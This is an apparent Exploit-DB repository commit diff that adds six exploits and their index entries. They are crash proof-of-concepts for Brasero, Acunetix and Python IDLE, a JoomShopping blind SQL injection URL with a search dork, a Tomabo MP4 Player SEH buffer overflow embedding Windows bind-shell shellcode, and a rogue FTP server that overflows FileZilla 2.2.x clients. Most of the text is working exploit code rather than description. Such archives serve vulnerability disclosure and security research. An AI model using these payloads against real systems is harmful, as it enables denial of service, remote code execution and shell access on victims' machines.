DB: 2015-08-09

6 new exploits
2015-08-09 05:02:36 +00:00 · 2015-08-09 05:02:36 +00:00 · 648b463161
commit 648b463161
parent 84f888e59b
7 changed files with 420 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -34040,10 +34040,12 @@ id,file,description,date,author,platform,type,port
 37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,"John Page",php,webapps,0
 37710,platforms/linux/local/37710.txt,"Sudo <=1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0
 37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,"John Page",php,webapps,80
+37714,platforms/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,php,webapps,80
 37715,platforms/php/webapps/37715.txt,"Tendoo CMS 1.3 - XSS Vulnerabilities",2015-07-29,"Arash Khazaei",php,webapps,80
 37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0
 37717,platforms/windows/dos/37717.pl,"KMPlayer 3.9.x - .srt Crash PoC",2015-07-31,"Peyman Motevalli Manesh",windows,dos,0
 37718,platforms/windows/dos/37718.py,"T-Mobile Internet Manager - Contact Name Crash PoC",2015-07-31,"SATHISH ARTHAR",windows,dos,0
+37719,platforms/windows/dos/37719.py,"Acunetix Web Vulnerability Scanner 9.5 - Crash PoC",2015-07-31,"Hadi Zomorodi Monavar",windows,dos,0
 37720,platforms/hardware/webapps/37720.py,"NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,hardware,webapps,0
 37721,platforms/multiple/dos/37721.c,"BIND9 - TKEY PoC",2015-08-01,"Errata Security",multiple,dos,0
 37722,platforms/linux/local/37722.c,"Linux Privilege Escalation Due to Nested NMIs Interrupting espfix64",2015-08-05,"Andrew Lutomirski",linux,local,0
@ -34051,9 +34053,13 @@ id,file,description,date,author,platform,type,port
 37724,platforms/linux/local/37724.asm,"Linux x86 Memory Sinkhole Privilege Escalation PoC",2015-08-07,"Christopher Domas",linux,local,0
 37725,platforms/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",php,webapps,0
 37726,platforms/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",php,webapps,80
+37727,platforms/windows/dos/37727.py,"Python IDLE 2.7.8 - Crash PoC",2015-08-07,"Hadi Zomorodi Monavar",windows,dos,0
+37729,platforms/windows/remote/37729.py,"Filezilla Client 2.2.X - SEH Buffer Overflow Exploit",2015-08-07,ly0n,windows,remote,0
+37730,platforms/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - (.m3u) SEH Buffer Overflow",2015-08-07,"Saeid Atabaki",windows,local,0
 37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - PUT Command Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21
 37732,platforms/win32/local/37732.c,"Windows NDProxy Privilege Escalation XP SP3 x86 and 2003 SP2 x86 (MS14-002)",2015-08-07,"Tomislav Paskalev",win32,local,0
 37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Stored XSS And CSRF Add Admin Exploit",2015-08-07,LiquidWorm,php,webapps,80
 37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 File Upload Filter Bypass Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80
 37738,platforms/php/webapps/37738.txt,"WordPress Job Manager Plugin 0.7.22 - Persistent XSS",2015-08-07,"Owais Mehtab",php,webapps,80
 37739,platforms/windows/dos/37739.py,"Dell Netvault Backup 10.0.1.24 - Denial of Service",2015-08-07,"Josep Pi Rodriguez",windows,dos,20031
+37743,platforms/linux/dos/37743.pl,"Brasero - Crash Proof Of Concept",2015-08-08,"Mohammad Reza Espargham",linux,dos,0
--- a/platforms/linux/dos/37743.pl
+++ b/platforms/linux/dos/37743.pl
@ -0,0 +1,43 @@
+#!/usr/bin/perl -w
+# Title : Kali (brasero) - Crash Proof Of Concept
+# website : https://www.kali.org/downloads/
+# Tested : kali 1.x
+#
+#
+# Author      :   Mohammad Reza Espargham
+# Linkedin    :   https://ir.linkedin.com/in/rezasp
+# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
+# Website     :   www.reza.es
+# Twitter     :   https://twitter.com/rezesp
+# FaceBook    :   https://www.facebook.com/mohammadreza.espargham
+#
+#
+
+#Demo : http://youtu.be/XMu5ZXupbOI
+
+system(($^O eq 'MSWin32') ? 'cls' : 'clear');
+
+
+$path="/tmp/r3z4.m3u";
+my $PoC = "\x41" x 10000 ;
+open(crash , ">", $path);
+print crash $PoC;
+close(crash);
+
+
+use threads;
+
+
+sub check_app {   #thread sub
+    system("brasero $path");
+    return 0;
+}
+
+my @threads;
+for (my $i = 0; $i < 20; $i++) {
+    my $thread = threads->create(\&check_app);
+    push(@threads, $thread);
+}
+foreach (@threads) { #join
+    $_->join();
+}
--- a/platforms/php/webapps/37714.txt
+++ b/platforms/php/webapps/37714.txt
@ -0,0 +1,11 @@
+# Exploit Title: [JoomShopping Blind Sql injection]
+# Google Dork: [allinurl:"/modules/mod_jshopping_products_wfl/js/"]
+# Date: [2015-07-24]
+# Exploit Author: [Mormoroth]
+# Vendor Homepage: [http://www.webdesigner-profi.de]
+# Software Link: [http://www.webdesigner-profi.de/joomla-webdesign/joomla-shop/downloads.html]
+# Version: [All] 
+# Tested on: [Linux]
+----------------------------
+site/modules/mod_jshopping_products_wfl/js/settings.php?id=209 and 1=2-- a
+----------------------------
--- a/platforms/windows/dos/37719.py
+++ b/platforms/windows/dos/37719.py
@ -0,0 +1,21 @@
+#!/usr/bin/env python
+# Title : Acunetix Web Vulnerability Scanner 9.5 - Crash Proof Of Concept
+# Website : https://www.acunetix.com
+# Tested : win 7 / win 8.1 / win vista
+#
+#
+# Author      :   Hadi Zomorodi Monavar
+# Email       :   zomorodihadi@gmail.com
+#
+# 1 . run python code : python poc.py
+# 2 . open hadi.txt and copy content to clipboard
+# 3 . open "Acunetix Web Vulnerability Scanner 9.5"
+# 4 . from Tools Explorer --> subdomain scanner
+# 5 . Paste ClipBoard on "Domain"
+# 6 . Click start
+# 7 . Crashed ;)
+
+crash = "\x41"*9000 #B0F
+file = open("hadi.txt", "w")
+file.write(crash)
+file.close()
--- a/platforms/windows/dos/37727.py
+++ b/platforms/windows/dos/37727.py
@ -0,0 +1,21 @@
+#!/usr/bin/env python
+# Title : Python IDLE 2.7.8  - Crash Proof Of Concept
+# Website : http://www.python.org/idle/
+# Tested : Windows 7 / Windows 8.1
+#
+#
+# Author      :   Hadi Zomorodi Monavar
+# Email       :   zomorodihadi@gmail.com
+#
+# 1 . run python code : python poc.py
+# 2 . open r3z4.txt and copy content to clipboard
+# 3 . open "python 2.7.8 IDLE"
+# 4 . from Menu (edit --> find)
+# 5 . Paste ClipBoard on "find"
+# 6 . Enter
+# 7 . Crashed ;)
+
+crash = "\x41"*900000 #B0F
+file = open("r3z4.txt", "w")
+file.write(crash)
+file.close()
--- a/platforms/windows/local/37730.py
+++ b/platforms/windows/local/37730.py
@ -0,0 +1,58 @@
+#!/usr/bin/python
+# Exploit Title: Tomabo MP4 Player 3.11.3 - (.m3u) SEH Buffer Overflow 
+# Date: 03/08/2015
+# Exploit Author: Saeid Atabaki
+# E-Mail: bytecod3r <at> gmail.com, saeid <at> Nsecurity.org
+# Linkedin: https://www.linkedin.com/in/saeidatabaki
+# Vendor Homepage: http://tomabo.com/mp4-player/index.html
+# Version: 3.11.3
+# Tested on: Windows XP SP3
+#---------------------------------------------------------------------#
+# Badchars: "\x00\x0a\x0d\x0c\x20\x09\x1a"'
+#
+# nc 192.168.11.136 8080
+# Microsoft Windows XP [Version 5.1.2600]
+# (C) Copyright 1985-2001 Microsoft Corp.
+#
+# C:\Documents and Settings\Administrator\Desktop>
+#---------------------------------------------------------------------# 
+
+import sys, struct
+file="crash.m3u"
+
+# Windows bind shell port 8080, feel free to swap shellcode
+sc =  ""
+sc += "\xdd\xc1\xd9\x74\x24\xf4\xb8\xd3\x4b\xb2\xa4\x5d\x31"
+sc += "\xc9\xb1\x53\x31\x45\x17\x83\xc5\x04\x03\x96\x58\x50"
+sc += "\x51\xe4\xb7\x16\x9a\x14\x48\x77\x12\xf1\x79\xb7\x40"
+sc += "\x72\x29\x07\x02\xd6\xc6\xec\x46\xc2\x5d\x80\x4e\xe5"
+sc += "\xd6\x2f\xa9\xc8\xe7\x1c\x89\x4b\x64\x5f\xde\xab\x55"
+sc += "\x90\x13\xaa\x92\xcd\xde\xfe\x4b\x99\x4d\xee\xf8\xd7"
+sc += "\x4d\x85\xb3\xf6\xd5\x7a\x03\xf8\xf4\x2d\x1f\xa3\xd6"
+sc += "\xcc\xcc\xdf\x5e\xd6\x11\xe5\x29\x6d\xe1\x91\xab\xa7"
+sc += "\x3b\x59\x07\x86\xf3\xa8\x59\xcf\x34\x53\x2c\x39\x47"
+sc += "\xee\x37\xfe\x35\x34\xbd\xe4\x9e\xbf\x65\xc0\x1f\x13"
+sc += "\xf3\x83\x2c\xd8\x77\xcb\x30\xdf\x54\x60\x4c\x54\x5b"
+sc += "\xa6\xc4\x2e\x78\x62\x8c\xf5\xe1\x33\x68\x5b\x1d\x23"
+sc += "\xd3\x04\xbb\x28\xfe\x51\xb6\x73\x97\x96\xfb\x8b\x67"
+sc += "\xb1\x8c\xf8\x55\x1e\x27\x96\xd5\xd7\xe1\x61\x19\xc2"
+sc += "\x56\xfd\xe4\xed\xa6\xd4\x22\xb9\xf6\x4e\x82\xc2\x9c"
+sc += "\x8e\x2b\x17\x08\x86\x8a\xc8\x2f\x6b\x6c\xb9\xef\xc3"
+sc += "\x05\xd3\xff\x3c\x35\xdc\xd5\x55\xde\x21\xd6\x46\x8f"
+sc += "\xaf\x30\x12\xbf\xf9\xeb\x8a\x7d\xde\x23\x2d\x7d\x34"
+sc += "\x1c\xd9\x36\x5e\x9b\xe6\xc6\x74\x8b\x70\x4d\x9b\x0f"
+sc += "\x61\x52\xb6\x27\xf6\xc5\x4c\xa6\xb5\x74\x50\xe3\x2d"
+sc += "\x14\xc3\x68\xad\x53\xf8\x26\xfa\x34\xce\x3e\x6e\xa9"
+sc += "\x69\xe9\x8c\x30\xef\xd2\x14\xef\xcc\xdd\x95\x62\x68"
+sc += "\xfa\x85\xba\x71\x46\xf1\x12\x24\x10\xaf\xd4\x9e\xd2"
+sc += "\x19\x8f\x4d\xbd\xcd\x56\xbe\x7e\x8b\x56\xeb\x08\x73"
+sc += "\xe6\x42\x4d\x8c\xc7\x02\x59\xf5\x35\xb3\xa6\x2c\xfe"
+sc += "\xc3\xec\x6c\x57\x4c\xa9\xe5\xe5\x11\x4a\xd0\x2a\x2c"
+sc += "\xc9\xd0\xd2\xcb\xd1\x91\xd7\x90\x55\x4a\xaa\x89\x33"
+sc += "\x6c\x19\xa9\x11"
+
+payload = "\x90" * 1028 + "\xeb\x18\x90\x90" + "\x69\x9e\x48\x00"  + "\x90" * 20 + sc
+
+writeFile = open (file, "w")
+writeFile.write( payload )
+writeFile.close()
--- a/platforms/windows/remote/37729.py
+++ b/platforms/windows/remote/37729.py
@ -0,0 +1,260 @@
+# Exploit Title: Filezilla client 2.2.X SEH buffer overflow exploit
+# Date: 02/08/2015
+# Exploit Author: ly0n
+# Vendor Homepage: filezilla-project.org/
+# Software Link: http://www.oldapps.com/filezilla.php?app=7cdf14e88e9dfa85fb661c1c6e649e90
+# Version: tested on filezilla 2.2.21
+# Tested on: Windows XP sp3 english
+
+
+#!/usr/bin/env python2
+# coding: utf-8
+import os,socket,threading,time
+#import traceback
+
+# visit: ly0n.me
+# greetz: NBS
+
+#MSGBOX "BrokenByte" 
+msgbox = ("\x68\x6e\x33\x72\x00\x68\x75\x74"
+"\x69\x30\x68\x5e\x58\x65\x63\x89"
+"\xe3\x68\x20\x20\x20\x00\x68\x68"
+"\x65\x72\x65\x68\x77\x61\x73\x20"
+"\x68\x6e\x33\x72\x20\x68\x75\x74"
+"\x69\x30\x68\x5e\x58\x65\x63\x89"
+"\xe1\x31\xc0\x50\x53\x51\x50\x50"
+"\xbe\xea\x07\x45\x7e\xff\xe6\x31"
+"\xc0\x50\xb8\x12\xcb\x81\x7c\xff"
+"\xe0")
+
+nops = "\x90" * 100
+#77EA9CAC    POP POP RET kernel32.dll <- seh
+#EB069090    SHORT JUMP 6 POS + 2 NOPS  <- nseh
+nseh = "\xeb\x06\x90\x90"
+seh = "\xAC\x9C\xEA\x77" 
+
+allow_delete = False
+local_ip = "192.168.11.6" #SERVER LOCAL IP
+local_port = 21 #DESIRED PORT
+
+buffer1 = "\x41" * 1896 + nseh  + seh + nops + msgbox + nops
+buffer = buffer1 + ".txt"
+currdir=os.path.abspath('.')
+ 
+class FTPserverThread(threading.Thread):
+    def __init__(self,(conn,addr)):
+        self.conn=conn
+        self.addr=addr
+        self.basewd=currdir
+        self.cwd=self.basewd
+        self.rest=False
+        self.pasv_mode=False
+        threading.Thread.__init__(self)
+ 
+    def run(self):
+        self.conn.send('220 Welcome!\r\n')
+        while True:
+            cmd=self.conn.recv(256)
+            if not cmd: break
+            else:
+                print 'Recieved:',cmd
+                try:
+                    func=getattr(self,cmd[:4].strip().upper())
+                    func(cmd)
+                except Exception,e:
+                    print 'ERROR:',e
+                    #traceback.print_exc()
+                    self.conn.send('500 Sorry.\r\n')
+ 
+    def SYST(self,cmd):
+        self.conn.send('215 UNIX Type: L8\r\n')
+    def OPTS(self,cmd):
+        if cmd[5:-2].upper()=='UTF8 ON':
+            self.conn.send('200 OK.\r\n')
+        else:
+            self.conn.send('451 Sorry.\r\n')
+    def USER(self,cmd):
+        self.conn.send('331 OK.\r\n')
+    def PASS(self,cmd):
+        self.conn.send('230 OK.\r\n')
+        #self.conn.send('530 Incorrect.\r\n')
+    def QUIT(self,cmd):
+        self.conn.send('221 Goodbye.\r\n')
+    def NOOP(self,cmd):
+        self.conn.send('200 OK.\r\n')
+    def TYPE(self,cmd):
+        self.mode=cmd[5]
+        self.conn.send('200 Binary mode.\r\n')
+ 
+    def CDUP(self,cmd):
+        if not os.path.samefile(self.cwd,self.basewd):
+            #learn from stackoverflow
+            self.cwd=os.path.abspath(os.path.join(self.cwd,'..'))
+        self.conn.send('200 OK.\r\n')
+    def PWD(self,cmd):
+        cwd=os.path.relpath(self.cwd,self.basewd)
+        if cwd=='.':
+            cwd='/'
+        else:
+            cwd='/'+cwd
+        self.conn.send('257 \"%s\"\r\n' % cwd)
+    def CWD(self,cmd):
+        chwd=cmd[4:-2]
+        if chwd=='/':
+            self.cwd=self.basewd
+        elif chwd[0]=='/':
+            self.cwd=os.path.join(self.basewd,chwd[1:])
+        else:
+            self.cwd=os.path.join(self.cwd,chwd)
+        self.conn.send('250 OK.\r\n')
+ 
+    def PORT(self,cmd):
+        if self.pasv_mode:
+            self.servsock.close()
+            self.pasv_mode = False
+        l=cmd[5:].split(',')
+        self.dataAddr='.'.join(l[:4])
+        self.dataPort=(int(l[4])<<8)+int(l[5])
+        self.conn.send('200 Get port.\r\n')
+ 
+    def PASV(self,cmd): # from http://goo.gl/3if2U
+        self.pasv_mode = True
+        self.servsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+        self.servsock.bind((local_ip,0))
+        self.servsock.listen(1)
+        ip, port = self.servsock.getsockname()
+        print 'open', ip, port
+        self.conn.send('227 Entering Passive Mode (%s,%u,%u).\r\n' %
+                (','.join(ip.split('.')), port>>8&0xFF, port&0xFF))
+ 
+    def start_datasock(self):
+        if self.pasv_mode:
+            self.datasock, addr = self.servsock.accept()
+            print 'connect:', addr
+        else:
+            self.datasock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+            self.datasock.connect((self.dataAddr,self.dataPort))
+ 
+    def stop_datasock(self):
+        self.datasock.close()
+        if self.pasv_mode:
+            self.servsock.close()
+ 
+ 
+    def LIST(self,cmd):
+        self.conn.send('150 Here comes the directory listing.\r\n')
+        print 'list:', self.cwd
+        self.start_datasock()
+	dirlist = "drwxrwxrwx    1 100      0           11111 Jun 11 21:10" +buffer1+"\r\n\n"
+	dirlist += "-rw-rw-r--    1 1176     1176         1060 Aug 16 22:22  "+buffer+" \r\n\n"
+	self.datasock.send("total 2\r\n"+dirlist)
+        self.stop_datasock()
+        self.conn.send('226 Directory send OK.\r\n')
+ 
+    def toListItem(self,fn):
+        st=os.stat(fn)
+        fullmode='rwxrwxrwx'
+        mode=''
+        for i in range(9):
+            mode+=((st.st_mode>>(8-i))&1) and fullmode[i] or '-'
+        d=(os.path.isdir(fn)) and 'd' or '-'
+        ftime=time.strftime(' %b %d %H:%M ', time.gmtime(st.st_mtime))
+        return d+mode+' 1 user group '+str(st.st_size)+ftime+os.path.basename(fn)
+ 
+    def MKD(self,cmd):
+        dn=os.path.join(self.cwd,cmd[4:-2])
+        os.mkdir(dn)
+        self.conn.send('257 Directory created.\r\n')
+ 
+    def RMD(self,cmd):
+        dn=os.path.join(self.cwd,cmd[4:-2])
+        if allow_delete:
+            os.rmdir(dn)
+            self.conn.send('250 Directory deleted.\r\n')
+        else:
+            self.conn.send('450 Not allowed.\r\n')
+ 
+    def DELE(self,cmd):
+        fn=os.path.join(self.cwd,cmd[5:-2])
+        if allow_delete:
+            os.remove(fn)
+            self.conn.send('250 File deleted.\r\n')
+        else:
+            self.conn.send('450 Not allowed.\r\n')
+ 
+    def RNFR(self,cmd):
+        self.rnfn=os.path.join(self.cwd,cmd[5:-2])
+        self.conn.send('350 Ready.\r\n')
+ 
+    def RNTO(self,cmd):
+        fn=os.path.join(self.cwd,cmd[5:-2])
+        os.rename(self.rnfn,fn)
+        self.conn.send('250 File renamed.\r\n')
+ 
+    def REST(self,cmd):
+        self.pos=int(cmd[5:-2])
+        self.rest=True
+        self.conn.send('250 File position reseted.\r\n')
+ 
+    def RETR(self,cmd):
+        fn=os.path.join(self.cwd,cmd[5:-2])
+        #fn=os.path.join(self.cwd,cmd[5:-2]).lstrip('/')
+        print 'Downlowding:',fn
+        if self.mode=='I':
+            fi=open(fn,'rb')
+        else:
+            fi=open(fn,'r')
+        self.conn.send('150 Opening data connection.\r\n')
+        if self.rest:
+            fi.seek(self.pos)
+            self.rest=False
+        data= fi.read(1024)
+        self.start_datasock()
+        while data:
+            self.datasock.send(data)
+            data=fi.read(1024)
+        fi.close()
+        self.stop_datasock()
+        self.conn.send('226 Transfer complete.\r\n')
+ 
+    def STOR(self,cmd):
+        fn=os.path.join(self.cwd,cmd[5:-2])
+        print 'Uplaoding:',fn
+        if self.mode=='I':
+            fo=open(fn,'wb')
+        else:
+            fo=open(fn,'w')
+        self.conn.send('150 Opening data connection.\r\n')
+        self.start_datasock()
+        while True:
+            data=self.datasock.recv(1024)
+            if not data: break
+            fo.write(data)
+        fo.close()
+        self.stop_datasock()
+        self.conn.send('226 Transfer complete.\r\n')
+ 
+class FTPserver(threading.Thread):
+    def __init__(self):
+        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        self.sock.bind((local_ip,local_port))
+        threading.Thread.__init__(self)
+ 
+    def run(self):
+        self.sock.listen(5)
+        while True:
+            th=FTPserverThread(self.sock.accept())
+            th.daemon=True
+            th.start()
+ 
+    def stop(self):
+        self.sock.close()
+ 
+if __name__=='__main__':
+    ftp=FTPserver()
+    ftp.daemon=True
+    ftp.start()
+    print 'On', local_ip, ':', local_port
+    raw_input('Enter to end...\n')
+    ftp.stop()
+